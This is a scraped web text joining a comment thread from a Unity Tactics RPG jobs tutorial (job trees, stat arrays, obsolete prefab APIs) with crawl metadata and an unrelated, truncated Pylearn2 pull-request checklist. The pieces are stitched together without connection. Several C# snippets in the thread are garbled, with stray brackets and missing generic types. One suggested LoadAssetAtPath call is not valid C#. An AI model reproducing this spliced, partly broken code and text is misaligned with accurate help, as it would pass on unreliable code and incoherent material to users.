Also, don’t bother with keys() or iterkeys() at all if you’re just going to iterate over it. for k in my_dictionary iterates over keys by default.
An exception to these rules is if you are _modifying_ the dictionary within the loop. Then you probably want to duplicate things with the keys(), values() and items() calls.
Are you updating a dictionary or OrderedDict with .update()?¶
If you are using the update() method of a dictionary or OrderedDict and you expect that none of the keys in the argument should already be in the dictionary, use safe_update() defined in pylearn2.utils.
Do you have an except: block?¶
You should almost never have a bare except: in library code. Use:
except Exception: ...
instead. This catches any subclass of Exception but lets through certain low-level exceptions like KeyboardInterrupt, SystemExit, etc. that inherit from BaseException instead. You almost certainly do not want your code to catch these.
Don’t raise a new exception, use the reraise_as method from pylearn2.utils.exc instead.:
except Exception: reraise_as(ValueError("Informative error message here"))
This retains the traceback and original error message, allowing for easier debugging using a tool like pdb.
Are you checking to see if an argument is iterable?¶
In places where a list, tuple, or other iterable object (say, a deque) will suffice, use pylearn2.utils.is_iterable.
Are you checking if something is a string?¶
Unless you have a very good reason you should probably be using isinstance(foo, basestring) which correctly handles both str and unicode instances.
Are you checking if something is a number?¶
Usually such checks are unnecessary but where they might be, we’ve defined some helpful constants.
Are you checking if something is _any_ kind of number?¶
Use isinstance(foo, pylearn2.utils.py_number_types). This checks against Python builtins as well as NumPy-defined numerical types.
Are you checking if something is an integer?¶
Use isinstance(foo, pylearn2.utils.py_integer_types). This checks against Python builtins as well as NumPy-defined integer types.
Are you checking if something is a float?¶
First, ask yourself: do you really need to? Would passing an integer here be inappropriate in all circumstances? Would a cast (i.e. float() be sufficient?
If you really need to, use isinstance(foo, pylearn2.utils.py_float_types). This checks against Python builtins as well as NumPy-defined float types.
Are you checking if something is a complex number?¶
Again, ask yourself whether passing a real here would be an error, and whether you can get away with a cast.
If you really need to, use isinstance(foo, pylearn2.utils.py_complex_types). This checks against Python builtins as well as NumPy-defined complex types.
Are you checking for the presence of np.nan or np.inf in an array?¶
If so, use pylearn2.utils.contains_nan or pylearn2.utils.contains_inf. To check for either np.nan or np.inf, use pylearn2.utils.isfinite. These functions are faster and more memory effecient than np.any(np.isnan(X)) or np.any(np.isinf(X)).
Are you creating Theano functions?¶
If you’re building Theano functions, use pylearn2.utils.function. This disables the on_unused_input check, which in most cases you don’t want to consider an error if you’re doing any kind of generic graph building.
Are you casting symbols/constants to a Theano floating point type?¶
Use pylearn2.utils.as_floatX to cast symbolic quantities to the default floating point type, and use constantX to create symbolic constants from a scalar or ndarray with the dtype specified in theano.config.floatX.
Do you have big nested loops for generating a Cartesian product?¶
Example:
stuff = [] for i in range(50): for j in range(20): for k in range(30): stuff.append((i, j, k))
Consider whether itertools.product will get the job done more readably and probably more efficiently.
Are you generating combinations or permutations of a set (or list, ...)?¶
itertools contains the functions permutations, combinations and combinations_with_replacement that will probably get the job done more efficiently than your own code.
Are you overriding methods in your class?¶
Use the decorator pylearn2.utils.wraps to inherit the docstring if it is unchanged. If you add a docstring to a function that is wrapped in this fashion, it will be appended below the inherited docstring.
Are you writing functions that uses pseudo-random numbers?¶
If you are using the NumPy generator, are you providing a way to seed it as well as a default seed ? You should never be using numpy.random functions directly. Use pylearn2.utils.rng.make_np_rng with a user-provided seed and a default_seed argument.
If you are using the Theano RNG you should create it similarly with pylearn2.utils.rng.make_theano_rng.
Are you assembling filesystem paths with dir + / + filename or similar?¶
Use os.path.join rather than concatenating together with ‘/’. This ensures the code still works on Windows.
Are you extracting the directory name or base filename from a file path?¶
Use os.path.basename and os.path.dirname to ensure Windows compatibility.
Are you opening/closing files?¶
Use the with statement, i.e.:
with open(fname, 'w') as f: f.write('blah blah blah')
This is cleaner and ensures that the file always gets closed, even in an error condition.
Are you adding new files or changing files permissions?¶
The files containing unit tests (named test_....py) should never be executable, otherwise nose will ignore them, and not execute the tests.
|
http://deeplearning.net/software/pylearn2/internal/pull_request_checklist.html
|
CC-MAIN-2017-09
|
refinedweb
| 2,187
| 59.6
|
Using Fabric to apply Puppet scripts
On my current client project, in terms of managing configuration of the various environments, I have separated things into two problem spaces – provisioning hosts, and configuring hosts. Part of the reason for this separation is that although targeting AWS, we do need to allow us to support alternative services in the future, but I also consider the type of tasks to be rather different and to require different types of tools.
For provisioning hosts I am using the Python AWS API Boto. For configuring the hosts once provisioned, I am using Puppet. I remain unconvinced as to the relative merits of PuppetMaster or Chef Server (see my previous post on the subject) and so have decided to stick with using PuppetSolo so I can manage versioning how I would like. This leaves me with a challenge – how do I apply the puppet configuration for the hosts once provisioned with Boto? I also wanted to provide a relatively uniform command-line interface to the development team for other tasks like running builds etc. Some people use cron-based polling for this, but I wanted a more direct form of control. I also wanted to avoid the need to run any additional infrastructure, so mcollective was never something I was particularly interested in.
After a brief review of my “Things I should look at later” list it looked like time to give Fabric a play.
Fabric is a Python-based tool/library which excels at creating command-line tools for machine management. It’s bread and butter is script-based automation of machines via SSH – many people in fact use hand-rolled scripts on top of Fabric as an alternative to systems like Chef and Puppet. The documentation is very good, and I can heartily recommend the Fabric tutorial.
The workflow I wanted was simple. I wanted to be able to checkout a specific version of code locally, run one command to bring up a host and also apply a given configuration set. My potentially naive solution to this problem is to simply tar up my puppet scripts, upload them, and then run puppet. Here is the basic script:
[python]
@task
def provision-box():
public_dns = provision_using_boto()
local("tar cfz /tmp/end-bundle.tgz path/to/puppet_scripts/*")
with settings(host_string=public_dns, user="ec2-user", key_filename="path/to/private_key.pem"):
run("sudo yum install -y puppet")
put("/tmp/end-bundle.tgz", ".")
run("tar xf end-bundle.tgz && sudo puppet –modulepath=/home/ec2-user/path/to/puppet_scripts/modules path/to/puppet_scripts/manifests/myscript.pp")
[/python]
The
provision_using_boto() command is an exercise left to the reader, but the documentation should point you in the right direction. If you stuck the above command in your
fabfile.py, all you need to do is run
fab provision-box to do the work. The first
yum install command is there to handle bootstraping of puppet (as it is not on the AMIs we are using) – this will be a noop if the target host already has it installed.
This example is much more simplified than the actual scripts as we have also implemented some logic to re-use ec2 instances to save time & money, and also a simplistic role system to manage different classes of machines. I may write up those ideas in a future post.
|
https://blog.magpiebrain.com/blog/page/2/
|
CC-MAIN-2019-43
|
refinedweb
| 553
| 52.39
|
There are 3 main ways to execute a python script.
1) Interactive Prompt
2) IDE (Python script)
3) Command Line (Python script)
*How you execute the code also depends on the version. Code written for python2.x may not always execute without traceback errors in python3.x. So the syntax is NOT always the same, nor not always importing the same modules. If your not sure how to find your version, check here. The differences between the two versions can be found here. You may also have to change your IDE's settings to select a different python version from the default, if you have multiple python versions installed.
Interactive Prompt
This is mostly used for experimenting and testing. Although you can write out long codes here, you should switch over to a file if you plan to write more than 3-5 lines. An IDE or file would be more appropriate and easier. The >>> is the prompt for interactive mode. What you type here is python code. Unlike the other methods of executing python, It will be executed right after you hit Enter, upon each line. The only time it does not execute after Enter (or each line) is when you are defining a function or class or a loop, for example. The ... will indicate that you are inside the block of what you are defining. **Some IDE's do not have the ..., in which it is advised to find a different IDE at that point. Once you finish writing the code inside the block, you must hit Enter twice, where it will execute and take you back to the >>> prompt depending on what you are defining.
The reason the interactive prompt is for testing is because:
1) it will execute upon each line or after the definition of a loop, class, function, etc.
2) Once you exit the interactive prompt, what code you wrote in it, is gone. There is no saving the code.
The other two methods of executing python code will save a file with your code in it.
Windows
Adding python to the PATH environmental variable. This process will allow you to execute python from any directory and execute a python script anywhere. If you plan on just putting the py file in the installation path, then you can bypass this.
In Windows 7 or less than, Click on Start Menu -> (on search) type: "command prompt". A Black icon "cmd" or Command prompt" will show up. Or open c:\Windows\system32\cmd.exe which will do the same. In windows 8, just type "cmd" in the menu, which should enable search, and pull of an icon of hte command console. This is a DOS prompt. You can do everything you can do normally on the PC in this DOS prompt with commands. The text before your cursor is the directory you are currently in. The command "cd" will change your current directory to the string after. The command 'dir' will list the directories in that directory that you are in. PythonXX should be in the directory C:\PythonXX (where XX represent the version you have downloaded). Once in the directory: type "python" to execute the interactive prompt.
UPDATE:
The default install path from python3.5 and on has been changed from
- Code: Select all
C:\Python3.X
to
- Code: Select all
C:\Users\username\AppData\Local\Programs\Python\Python3X-XX
Where Python35-32 would mean Python3.5 for 32 bit, etc. If you are using this or a later version change the path accordingly for this tutorial. Unless you changed the default path upon installation
- Code: Select all
C:\Windows\system32>cd c:\Python32
C:\Python32>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 ...
Type "help", "copyright", "credits" or "license" for more information.
>>>
If you see ">>>", then you are in in the python interactive prompt.
However this will only execute python code in the directory C:\Python32.
Are you getting this Error?
- Code: Select all
python is not recognized as an internal or external command,
operable program or batch file.
This will make the Python executable runable from anywhere, not any script. If the script lives in a different directory than where you are at, you still need to change to that directory, or give the full path of that file to execute it.
To make python execute in any directory in Windows. You have to add python to the PATH environmental variable. To get there:
[Window 7] My Computer (right-Click) > Properties > Advanced System Settings > Environmental Variables > Under System Variables > double click Path > append python directory path to this, separated by semicolons (see below). Click OK to all the windows you have up.
[Windows 8] Go to Metro or Start and just type in "Advanced System Settings" > Environmental Variables > Under System Variables > double click Path > append python directory path to this, separated by semicolons (see below). Click OK to all the windows you have up.
Youtube screencast
For the example above using Python32. In environmental variables there is a path varaible already existing
i changed the path variable from:
- Code: Select all
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
to
- Code: Select all
%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Python32
So i appended to the variable
- Code: Select all
;C:\Python32
After that, OK out of all those windows, kill the command console and get a fresh command console with the same method you did before. However, this time, you will notice that you can change directory into any directory, and the command python will pull up the interpreter. An easy indicator that you were successful.
an example output:
before setting the path:
- Code: Select all
C:\Users\metulburr>python
'python' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\metulburr>cd Python32
C:\Users\metulburr\Python32>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on win
32
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
C:\Users\metulburr\Python32>cd ..
C:\Users\metulburr>python
'python' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\metulburr>
refresh the console
after setting the path:
- Code: Select all
C:\Users\metulburr>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on wi
32
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
C:\Users\metulburr>cd C:\
C:\>python
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on wi
32
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
C:\>
To do that in command prompt:
- Code: Select all
set PATH=%PATH%;C:\My_python_lib
Linux
Open a Terminal. It does not matter what directory you are in. If you have both python2.x and python3.x installed, you can use either interactive prompt by a number. "python" is the default for your OS. The default may be python3.x in some distros (currently now is gentoo and arch)
python2.x
- Code: Select all
metulburr@ubuntu:~$ python
Python 2.7.3 (default, Aug 1 2012, 05:14:39)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
python3.x
- Code: Select all
metulburr@ubuntu:~$ python3
Python 3.2.3 (default, May 3 2012, 15:51:42)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
depending on your linux distro and time as more and more distros use python3.x as default in the comming years, python3.x may be default where python referes to 3.x and python2 referes to 2.x
IDE
An IDE is just a fancy text editor. That's it. It does not perform magic tricks. You can accomplish the same without ever installing an IDE. See below for Command line / Terminal as this does just that. The bare bones of an IDE just creates a file and puts your text in that file, with a button to execute it. There are numerous IDE's. The only difference is preference. Some are free and some are not, but give out a free version that will work.
Each IDE is different in how you configure it, execute code, etc. Some have a run command, and F# key, Ctrl+b, etc. to execute the python code. Some will open a terminal/console with for the output, some will have embedded terminals, and some will have their own area for output. Some will have all of these options, some will have only a few of these options. All IDE's can be re-configured to your liking.For example: If you don't like that F5 runs your code, you can change the keybinding to Ctrl + b, or vice-versa. If you want an embedded terminal in the IDE and the IDE doesn't do it by defualt, chances are there is a plugin for that IDE that will allow it. And so on and so on.
What is IDLE? IDLE is just only one of the numerous IDE's. Just because python on windows comes with IDLE, does not mean python needs IDLE to run. It is there for beginner's convenience. Also by most programmers, it is also considered one of the worst IDE's too. It shall be fine for beginner's though. You can research why with a google search later, or run across the reasons yourself as you progess in programming. For those that stick with IDLE, IDLE starts you off with the python interpreter. This is not a command line! It is just a GUI form of the python interpreter that you can also get in the command line/terminal. It confuses a lot of beginner's because they think they click new window, write their code, and run their code in the python interpreter, thinking it is a command line or terminal. File -> New Window creates an empty file in the same way that Notepad does. And Run -> Run Module executes this code. The output of the code (at least in IDLE) is displayed amongst the python interpreter as opposed to a terminal, AKA ('>>>'). And the python interpreter is there for a quick one liner tests here and there, not to run the code you saved in the new window.
*IDLE is also one of the IDE's that does not show the ... in the embedded interpreter for indentation. It is advised to find another IDE or use the command line, if you use the interpreter a lot.
If you are confused on the process of using an IDE, or if you still think python requires idle to run, then install some other IDE's and use them for awhile. Try at least 5 of them out. In addition to that, open and write a file in notepad, and execute it in the command prompt. Then create a file, write in the file, and execute that file all in the command prompt all without using an IDE or GUI text editor. At this point you may start to understand the concept.
Command Line / Terminal
More often than you think, people will not use an IDE. In this case you open any text editor you want, write code, and when you save it you save it with the file extension of ".py". An IDE is just a fancy text editor, that's it! You can use anything, Gedit, notepad, IDLE, whatever to write the code. All IDE's have a way of quick run, but you can also run them from the terminal/DOS as shown below.
- Code: Select all
test.py
For Windows simplicity: put this test.py file in your directory that you started the interactive prompt: for example of the path:
- Code: Select all
c:\Python32\test.py
and example of the same path executed:
- Code: Select all
c:\Python32>python test.py
Then you open a Terminal/DOS prompt and change directory to your test.py and write this:
- Code: Select all
python test.py
The same as before like with the interactive prompt, but this time we add a argument and the argument is your .py file.
So in short, you can either change to the directory that the file lives in and execute it from there:
- Code: Select all
C:\>cd C:\my_python_lib
C:\my_python_lib>python.exe test.py
or you can execute it from any directory if you give the full path of the file:
- Code: Select all
C:\>python.exe C:\my_python_lib\test.py
Does your program when executed just flicker and then go away? Most Windows users have got accustomed to double clicking an icon and have it execute. To adjust the program for double clicking, the basic method is to add the builtin input to have it ask the user for "nothing" to assure that the user must hit ENTER before the program closes out. raw_input() for Python 2.x and input() for Python 3.x. Just put this after your program at the end of the file and it will restrict the program to prematurely exiting. This is however only effective if you plan to execute the program by double clicking it. If you use a command line/Terminal to execute the program, you do not need the input function as the command line will still allow you to view the output of your program even after exiting, as you just get the users prompt when it exits.
Linux
- Code: Select all
metulburr@ubuntu:~$ touch tester.py
metulburr@ubuntu:~$ vim tester.py
metulburr@ubuntu:~$ cat tester.py
print('this is a test')
metulburr@ubuntu:~$ python3 tester.py
this is a test
metulburr@ubuntu:~$
This example shows the creation and execution of a one line python script. 'touch tester.py' creates the file, although vim will create it anyways. 'vim tester.py' opens one of the numerous text editors. Remember, you can use anything. 'cat tester.py' shows the content of the .py file that i wrote in it, in vim. 'python3 tester.py' executes the script I made with python3.x. 'this is a test' is the output of that program executed.
Command line commands
It depends on what OS you are on as to what the commands are. Some basics are:
- Code: Select all
cd something
to change directory to the the directory something (assumeing the file is named 'something'). Of course if that file was nested in another file, you first have to change to that directory (file), then to this one.
- Code: Select all
ls
to list the current directory contents in LInux
- Code: Select all
dir
to list the current directory contents in Windows
Interactive prompt help()
while in the interactive prompt, you can use the help function to show the documentation for that specific module. For 3rd party modules you have installed you must import it and then help(your_module), it will show a description, classes, functions, version number, author. For builtins it will show class and methods and description of each method, etc.
default help screenclass, methods,
- Code: Select all
import module and help()
- Code: Select all
>>>from bs4 import BeautifulSoup
>>>help(BeautifulSoup)
>>>import urllib
>>>help(urllib)
show me the documentation for strings
- Code: Select all
>>>help(str)
show the specific method s.find()
- Code: Select all
>>>help(str.find)
show all modules installed for this version of python
- Code: Select all
>>>help('modules')
Resources
IDE's
Python Integrated Development Environments (IDE). A list of of IDE's and info about them.
Internet Relay Chat (IRC) - an IRC channel that is friendly and helpful
When you ask a question the first time, if no one is chatting, wait for up to maybe 2 hours before closing out as to give us time to see it. 3 Minutes is not enough as we are not sitting there all day staring at IRC waiting every second for everyone to ask questions.
IRC in Browser
SERVER: irc.freenode.net
CHANNEL: #python-forum
Official python site
Python tutorials
Download python versions, tutorials, information
PEPS
Information for python, for example PEP 8 is guidlines for style in coding Python.
Online Interpreter
Test Python without installing it
Porting Guide
Check the different modules for 2.x versus 3.x
Modules ported to Python3.x
View 3rd party modules and see if they have been ported to Python 3.x yet. Even if the module you are looking for does not support Python 3.x, there may be methods to tinker it to work, BETA testing, etc. that you can use to get it working still. Google and research and you just might be surpirsed what people have accomplished.
Some 3rd party modules
Django
Web framework for python.
Bottle
Lightweight web framework for python
BeautifulSoup
Parse HTML with Python
wxPython
PyQt
GUI Libraries for Python. There is also tkinter which comes with python (most of the time)
PyGame
2D gaming Library for python
PyOpenGL
3D Library
cx_freeze
package your apps with their dependencies
py2exe
package your apps for Windows users
Avoiding massive elif statements
the first example shows elif statments as you would learn them in any tutorial, the second however shows the same thing done but with no elif statments. It does the same thing but reduces the code and makes it more debugable in the future.
- Code: Select all
choice = input('enter a number')
if choice == '0':
print('you chose zero')
elif choice == '1':
print('you chose one')
elif choice == '2':
print('you chose two')
elif choice == '3':
print('you chose three')
else:
print('out of range/invalid')
- Code: Select all
user_choice = {'0':'zero','1':'one','2':'two','3':'three'}
choice = input('enter a number')
try:
print('you chose {}'.format(user_choice[choice]))
except KeyError:
print('out of range/invalid')
|
http://www.python-forum.org/viewtopic.php?f=10&t=55
|
CC-MAIN-2016-40
|
refinedweb
| 2,987
| 73.98
|
MultiLineEditText Documentation
- blastframe last edited by blastframe
Hello,
I'm using Python Syntax Highlighting with a GeDialog MultiLineEditText. In order to make this work, I have to pass
c4d.DR_MULTILINE_PYTHON | c4d.DR_MULTILINE_SYNTAXCOLORas the
style's Symbol IDs. This was not clear from the documentation which describes
DR_MULTILINE_SYNTAXCOLORas C.O.F.F.E.E. syntax highlighting.
It took me some time to figure out that
DR_MULTILINE_PYTHONdoes not work on its own and that
DR_MULTILINE_SYNTAXCOLORis not strictly for C.O.F.F.E.E.. Could you please explain this better in the documentation?
Thank you.
Sorry for the late reply, I thought I answered while not.
The next documentation will be fixed:
DR_MULTILINE_SYNTAXCOLORenables syntax color, coffee, or Python. Since coffee is removed it only helps for the Python Highlighting.
DR_MULTILINE_PYTHONenables specific python line return handling e.g. writing
def Something():, pressing enter will put the caret (text cursor) to a new line and indent it to match python syntax rule.
Cheers,
Maxime.
- blastframe last edited by
|
https://plugincafe.maxon.net/topic/12810/multilineedittext-documentation
|
CC-MAIN-2020-40
|
refinedweb
| 164
| 50.43
|
Created on 2007-02-04 22:34 by nagle, last changed 2009-03-31 22:12 by georg.brandl. This issue is now closed.
I'm running a website page through BeautifulSoup. It parses OK with Python 2.4, but Python 2.5 fails with an exception:
Traceback (most recent call last):
File "./sitetruth/InfoSitePage.py", line 268, in httpfetch
self.pagetree = BeautifulSoup.BeautifulSoup(sitetext) # parse into tree form
File "./sitetruth/BeautifulSoup.py", line 1326, in __init__
BeautifulStoneSoup.__init__(self, *args, **kwargs)
File "./sitetruth/BeautifulSoup.py", line 973, in __init__
self._feed() 291, in parse_starttag
self.finish_starttag(tag, attrs)
File "/usr/lib/python2.5/sgmllib.py", line 340, in finish_starttag
self.handle_starttag(tag, method, attrs)
File "/usr/lib/python2.5/sgmllib.py", line 376, in handle_starttag
method(attrs)
File "./sitetruth/BeautifulSoup.py", line 1416, in start_meta
self._feed(self.declaredHTMLEncoding) 285, in parse_starttag
self._convert_ref, attrvalue)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 0: ordinal not in range(128)
The code that's failing is in "_convert_ref", which is new in Python 2.5. That function wasn't present in 2.4. I think the code is trying to handle single quotes inside of double quotes in HTML attributes, or something like that.
To replicate, run
or
through BeautifulSoup.
Something about this code doesn't like big companies. Web sites of smaller companies are going through OK.
I had a similar problem recently and did not have time to file a bug-report. Thanks for doing that.
The problem is the code that handles entity and character references in SGMLParser.parse_starttag. Seems that it is not careful about unicode/str issues.
(But maybe Beautifulsoup needs to tell it to?)
My quick'n'dirty workaround was to remove the offending char-entity from the website before feeding it to Beautifulsoup::
text = text.replace('®', '') # remove rights reserved sign entity
cheers,
stefan
Found the problem. In sgmllib.py for Python 2.5, in convert_charref, the code for handling character escapes assumes that ASCII characters have values up to 255.
But the correct limit is 127, of course.
If a Unicode string is run through SGMLparser, and that string has a character in an attribute with a value between 128 and 255, which is valid in Unicode, the
value is passed through as a character with "chr", creating a
one-character invalid ASCII string.
Then, when the bad string is later converted to Unicode as the output is assembled, the UnicodeDecodeError exception is raised.
So the fix is to change 255 to 127 in convert_charref in sgmllib.py,
as shown below. This forces characters above 127 to be expressed with
escape sequences. Please patch accordingly. Thanks.
def convert_charref(self, name):
"""Convert character reference, may be overridden."""
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 127 : # ASCII ends at 127, not 255
return
return self.convert_codepoint(n)
We've been running this fix for several months now, and it seems to work. Would someone please check it and put it into the trunk? Thanks.
Hello,
I've been able to fix this entity conversion bug with the following patch.
Cheers,
Odie
--- /usr/lib/python2.5/sgmllib.py 2007-05-27 17:55:15.000000000 +0200
+++ modules/sgmllib.py 2007-06-06 18:29:13.000000000 +0200
@@ -396,7 +396,7 @@
return self.convert_codepoint(n)
def convert_codepoint(self, codepoint):
- return chr(codepoint)
+ return unichr(codepoint)
def handle_charref(self, name):
"""Handle character reference, no need to override."""
Restore bug title.
The 255 -> 127 change works for me. Let me know if I can help with unit
tests or whatever to get this patched.
A patch against SVN trunk including a unittest would be great.
Attached patch against SVN trunk including unittest. The test is not
great, because it practically only checks if the patch was applied and
not the real-life situation where the exception occurs, but I'm not too
handy with sgmllib (I only encountered this problem through
BeautifulSoup).
Committed in r70906.
|
http://bugs.python.org/issue1651995
|
CC-MAIN-2017-04
|
refinedweb
| 663
| 61.53
|
If you’ve ever seen Python in action, even at a distance, I’m sure you’ll agree that it looks pretty neat. And the combination of development speed, out-of-the-box power, and stunning syntax usually means you end up with one thing… elegant, maintainable solutions, quickly. And lets face it, that’s just what web developers are looking for right?
I’ll let you judge for yourself…
In this article we’re going to be using Python to write some small and (hopefully) interesting examples, starting with simple form handling and ending with a complete, full featured (upload limit, file types etc.) upload script that you can use in your websites!
If you haven’t guessed it already this is a Python article, so if you’re new to the language I highly recommend reading Martin Tsachev’s Getting Started with Python before reading this one. if you need a quick intro to Python CGI, skim over Preston Landers’ “Writing CGI Programs in Python”.
Before we get going, you’ll need a few things before you can run the examples in this article:
1. A web server set up to handle CGI (tested with Apache)
2. The latest version of Python from
Creating a Form to Display User Details
Possibly the most important thing a web application does is collect user input. And like most things, Python has just the module we need in its Standard Library.
Let’s jump right in and write a small function to display the user’s details if any where entered. (For this we’ll assume our form looks like this… three input boxes called – ‘name’, ‘age’ and ‘email’. A check box called ‘done’ and a ‘submit’ button)
#!/usr/bin/env python
import cgi
form = cgi.FieldStorage()
def values(fields):
for value in fields:
if value in form: print form[value].value + ‘<br />’
if __name__ == ‘__main__':
print ‘Content-Type: text/htmln’
if ‘submit’ and ‘done’ in form:
values((‘name’, ‘age’, ‘email’))
else:
print ‘if you were directed here in error please visit here.com’
This is very simple but it gives you an idea of how easy working with forms is when you strip away all the crap!
In this example (and most of the examples in this article) we start by importing the ‘cgi’ module and creating an instance of the FieldStorage() class to store our form values. Next we define a new user function called values() which takes a sequence of field names and iterates over them, printing the value if the one was set. Finally before the function outputs anything we check if the ‘submit’ and ‘done’ fields exist.
Ok, chances are you noticed this but just for clarity: forms in Python work like any dictionary, with the exception that you have to follow the call by the variable you want access from that key i.e. form['key'].value gives you the value.
{mospagebreak title=Creating a Warning}
Like life itself, we seem to want more control. And this next function we’ll create will give us just that — and output a warning if the field wasn’t filled in correctly!
#!/usr/bin/env python
import cgi, re
form = cgi.FieldStorage()
def check(**fields):
for field in fields:
if field in form:
value = form[field].value
if re.search(fields[field], value): print value + ‘<br />’
else: print field, ‘was not filled in correctly!<br />’
if __name__ == ‘__main__':
print ‘Content-Type: text/htmln’
if ‘submit’ and ‘done’ in form:
check(name = ‘^[a-zA-Z ]+$’, age = ‘^d{2}$’)
else:
print ‘if you were directed here in error please visit here.com’
Since this is pretty similar to our other function, I’m just going to skip over it quickly. If you’ve ever used Perl, then you’ve spotted the regular expressions hiding in there.
Regular expressions in Python are accessed though the ‘re’ module (Python’s regular expression library), for obvious reasons… regular expressions still seem like the best way to describe and check form values.
If you want to find out more about regular expressions and Python check out the ‘re’ module at
Then if the value isn’t what we want, we get a warning instead of just ignoring the field.
Anyone wondering what **fields is all about? I’m sure someone is. The simplest explanation I can think of is that it tells the function to expect a variable number of arguments in X format (currying in functional programming) i.e.:
>>> def show(*args, **kwds):
… print args, kwds
…
>>> show()
() {}
>>> show(‘interesting’, ‘dont ya think!’, arg1 = ‘str1′, arg2 = 2)
(‘interesting’, ‘dont ya think!’) {‘arg1′: ‘str1′, ‘arg2′: 2}
>>>
Simple, and very useful form time to time! Time for a cookie break… No, not the food… although, still pretty sweet over all.
{mospagebreak title=Cookies}
Next up we’ll use Python’s ‘Cookie’ module to do a little baking! (Ironically I suck at making real cookies.)
>>> import Cookie
>>> cookie = Cookie.SimpleCookie()
>>> cookie['number1'] = ‘some values’
>>> cookie['number2'] = ‘some values’
>>> cookie['number3'] = ‘some values’
>>> cookie['number3']['expires'] = 3600
>>> print cookie
Set-Cookie: number1=”some values”;
Set-Cookie: number2=”some values”;
Set-Cookie: number3=”some values”; expires=Fri, 30-Jan-2004 12:03:20 GMT;
Ok, you have to agree, setting cookies couldn’t be much simpler, and the ‘Cookie’ module wraps it up nicely. The difficulty comes when you want to retrieve your values… ok maybe I’m exaggerating a little here.
#!/usr/bin/env python
import os
def monster():
if ‘HTTP_COOKIE’ in os.environ:
cookies = os.environ['HTTP_COOKIE']
cookies = cookies.split(‘; ‘)
handler = {}
for cookie in cookies:
cookie = cookie.split(‘=’)
handler[cookie[0]] = cookie[1]
return handler
if __name__ == ‘__main__':
import Cookie
cookie = Cookie.SimpleCookie()
cookie['monster'] = ‘cookievalue’
print cookie
print ‘Content-Type: text/htmln’
print ‘Hit refresh to see the cookie!!!<br />’
print ‘Hewwo, im the cookie’, monster()
This is all about parsing the ‘HTTP_COOKIE‘ header and inserting the cookie values into a dictionary.
We start by importing the ‘os’ module into our program and defining the monster() function — this checks if the ‘cookies’ string exists or not. If it does then we split it, leaving us with a list of ‘key=value’ strings. After that all we have left to do is loop over the list and split the values again, placing them into the dictionary.
Ok finally let’s do something a little useful with our cookies… and in keeping with our final example, we’re going to create a counter function, which allows you to set limits on different processes. Observe and enjoy.
#!/usr/bin/env python
import Cookie, os
def limits(count):
if ‘HTTP_COOKIE’ in os.environ:
cookies = os.environ['HTTP_COOKIE']
cookies = cookies.split(‘; ‘)
handler = {}
for cookie in cookies:
cookie = cookie.split(‘=’)
handler[cookie[0]] = cookie[1]
if ‘count’ in handler:
number = int(handler['count'])
if number < count:
cookie = Cookie.SimpleCookie()
cookie['count'] = number + 1
cookie['count']['expires'] = 86400
print cookie
return True
else:
print Cookie.SimpleCookie(‘count=1′)
return True
if __name__ == ‘__main__':
if limits(5):
print ‘user was under their limit, do this…’
else:
print ‘user was over their limit, do nothing!’
The start of this is exactly the same as in our monster() function except that if there are no cookies set, then we create one and set its value to one. If there are any cookies to unpack, then we check for ‘count’ in the handler dictionary and type-cast its value to a ‘number’ using int()… ‘number’ is then compared to the ‘count’ variable to check if the user is under or over their limit. Provided they’re under their limit, then we update the cookie and set the expiry date to 24 hours before returning True; this is done so we can use if-else blocks to control the users access.
{mospagebreak title=Sending Email}
Ok, what about sending email? What sounds like a big, scary subject is actually pretty simple once you get down to it. And because of Python’s amazingly clear syntax it’s very clean, not to mention compact.
#!/usr/bin/env python
import smtplib
def mail(address, subject, message, host = ‘localhost’):
headers = ‘From: %srnTo: %srnSubject: %srnrn%s’
message = headers % (address[0], ‘,’.join(address[1:]), subject, message)
server = smtplib.SMTP(host)
server.sendmail(address[0], address[1:], message)
server.quit()
if __name__ == ‘__main__':
mail((‘someone@somewhere.com’, ‘sometwo@somewhere.com’), ‘subject’, ‘message’)
Admit it, how much smaller is that than you expected! Before we delve deeper into this function, you need to understand a little about how it’s being called or chances are you’ll end up with errors!
mail((‘from’, ‘to’, …), ‘subject’, ‘message’, ['host'])
The first argument here is a sequence of two or more addresses, the first being the ‘From’ address and the rest ‘To’ addresses. Followed by the ‘Subject’ and ‘Message’. You may also need to tell this function what host you want to use if one isn’t available locally.
For this example we started by importing the ‘smtplib‘ module, which provides functions/classes for sending emails from Python… so mail() is really just a wrapper over what you would normally do to send email, but it does make things easier!
That is to say, inside mail() we do two main things…
- Create a MIME header containing our ‘From’ and ‘To’ addresses… as well as any other data we want to send i.e. Subject, Message, Content-Type. When complete this is assigned to the ‘message’ variable.
- Connect to the mail server using the SMTP() class. If the connection is successful then the addresses and ‘message’ header are sent to using the sendmail() method before quitting.
If you plan on playing with ‘smptlib’ or similar modules, then you’ll probably end up thanking the programmer who wrote it, for the set_debuglevel() method! As is my experience, anything that could go wrong will go wrong the first few times i.e.:
server = smtplib.SMTP(host)
server.set_debuglevel(1)
server.sendmail(from, to, message)
server.quit()
{mospagebreak title=A Last Example}
So far you’ve seen how you can use Python to get forms data, create cookies and send email… in this last example we’ll be using as much of what you’ve learned here as we can (without going over the top).
#!/usr/bin/env python
import cgi, os, sys
sys.stderr = sys.stdout
def uploads(form, name, path, *args):
if form.has_key(name):
#If the form field exists if ‘form’ then parse the filename to point
#at the desired location.
path = os.path.join(path, os.path.basename(form[name].filename))
for each in args:
